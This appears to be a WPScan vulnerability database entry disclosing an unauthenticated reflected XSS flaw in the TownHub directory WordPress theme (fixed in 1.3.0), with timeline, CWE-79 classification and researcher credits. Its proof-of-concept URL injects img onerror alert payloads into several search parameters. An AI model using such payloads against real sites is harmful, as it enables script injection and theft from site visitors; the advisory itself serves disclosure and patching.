TownHub < 1.3.0 - Unauthenticated Reflected XSS



Description
Unauthenticated Reflected XSS vulnerability was discovered in the «TownHub - Directory & Listing WordPress Theme», tested version — v1.2.9.

Edit (WPScanTeam)
June 17th, 2020 - Confirmed & Escalated to Envato
June 18th, 2020 - v1.3.0 released, fixing the issue
Proof of Concept
https://example.com/?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS1`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS4`)%3E&lcats[]=195

Affects Theme

fixed in version 1.3.0

References

URL https://themeforest.net/item/townhub-directory-listing-wordpress-theme/25019571

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Vlad Vector
Submitter VLΛD VΞCTOR
Submitter Website https://vladvector.ru
Submitter Twitter vlad_vector
Views 591
Verified Yes
WPVDB ID 10274

Timeline

Publicly Published 2020-06-19 (20 days ago)
Added 2020-06-19 (20 days ago)
Last Updated 2020-06-20 (19 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin